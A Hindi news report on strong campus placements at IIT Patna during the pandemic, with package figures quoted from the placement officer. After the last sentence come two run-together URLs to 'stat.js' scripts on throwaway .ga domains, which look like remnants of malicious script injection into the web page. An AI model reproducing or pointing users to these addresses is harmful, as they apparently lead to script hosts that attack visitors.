कोरोनावायरस महामारी मे आईआईटी पटना में बेहतर प्लेसमेंट देखने को मिला है। इस महामारी में दुनिया भर में बहुत सारी कंपनियां बंद हो चुकी हैं बहुत से लोग अपने शहर और गांव लौट चुके हैं। इसके बावजूद भी आईआईटी पटना के छात्रों को लाखों का पैकेज मिला है पटना आईआईटी में इस बार कुल 16 कंपनियों ने 38 छात्रों का सेलेक्शन किया है।
मिली जानकारी के अनुसार इनमें से एक आईआईटी के छात्र को 43.50 लाख प्रतिवर्ष का पैकेज मिला है। इस बात की जानकारी ट्रेनिंग एंड प्लेसमेंट ऑफिसर कृपाशंकर ने दी है। उन्होंने बताया कि एक दूसरे छात्र को 33.50 लाख प्रति वर्ष मिला है, दो और छात्रों को मीडिया नेट द्वारा 29.92 लाख वर्ष पर सेलेक्शन किया गया है।उन्होंने बताया कि इनके अलावा प्रि-फाइनल ईयर के छात्रों को गूगल के द्वारा इंटर्नशिप का ऑफर दिया गया।
कुछ दिन पहले ही में जापान की कंपनी ने एमटेक के अविनाश सिंह, निधि ठाकुर व राजीव रोशन को 59-59 लाख का ऑफर दिया गया था। वही बीटेक के सौरभ को माइक्रोसॉफ्ट ने 40 लाख ऑफर दिया था। पटना आईआईटी में ट्रेंनिंग एंड प्लेसमेंट का काम सितंबर के पहले सप्ताह से ही शुरू हो गया था। डॉक्टर कृपाशंकर सिंह ने बताया कि महामारी के बावजूद भी उम्मीद से बेहतर प्लेसमेंट हुआ है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms